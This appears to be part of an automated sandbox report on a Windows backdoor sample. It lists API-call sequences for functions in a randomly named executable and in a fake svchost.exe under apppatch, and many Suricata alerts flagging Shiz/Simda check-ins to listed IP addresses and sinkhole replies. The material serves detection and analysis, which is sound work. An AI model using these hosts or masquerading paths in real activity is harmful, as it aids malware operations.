Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_02897400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	5_2_02897400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028ACC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_028ACC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028B9460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	5_2_028B9460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028BD5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	5_2_028BD5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0245E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	6_2_0245E1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0246D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	6_2_0246D638
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02469460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	6_2_02469460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02447400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	6_2_02447400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0245CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	6_2_0245CC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0246D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	6_2_0246D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E16B1C FindFirstFileExW,	8_2_00E16B1C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_012FE1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	8_2_0130D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E7400 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	8_2_012E7400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_012FCC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01309460 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	8_2_01309460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	8_2_0130D638

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D3D060 StrStrIA,memset,memset,SetErrorMode,SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,GetFileAttributesA,PathAddBackslashA,CreateDirectoryA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,CopyFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,PathAddBackslashA,SetErrorMode,

1_2_02D3D060

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49735 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49658 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49663 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49662 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49662 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53971
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49663 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49736 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49736 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51111 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:60209 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49735 -> 3.64.163.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49658 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51129 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51129 -> 103.224.212.210:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49655 -> 69.162.80.60:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49651 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49651 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51111 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49731 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:60209 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49651
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:53004
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:60209
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:60209
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49655 -> 69.162.80.60:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49653 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49653 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49733 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49733 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51128 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51128 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49732 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49657 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49732 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49657 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:63402
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51125 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49734 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49734 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49651
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51130 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51125 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49652 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49652 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50749 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50749 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49660 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49660 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49656 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49652
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49652
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51130 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51122 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51122 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51112 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51112 -> 103.150.11.230:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50750 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50750 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:63803 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:56536
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:63803 -> 52.34.198.229:80
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:63803
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:63803
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:61998
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:54206
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:51124 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51124 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:54974
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64272 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64272 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64277 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64277 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50116 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50116 -> 64.225.91.73:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50751 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50751 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64301 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64301 -> 103.224.182.252:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64284 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64284 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64298 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64288 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64275 -> 69.162.80.60:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64275 -> 69.162.80.60:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64273 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64288 -> 5.79.71.225:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64273 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64285 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64298 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:49517 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49517 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64290 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56389 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56389 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64290 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:63308 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64271 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64271 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64283 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64303 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:63308 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64283 -> 172.234.222.143:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64303 -> 154.85.183.50:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64299 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:64299 -> 15.197.240.20:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56386 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:56386 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:64276 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:50118 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:50118 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2803437 - Severity 1 - ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin : 192.168.2.4:56388 -> 208.100.26.245:80
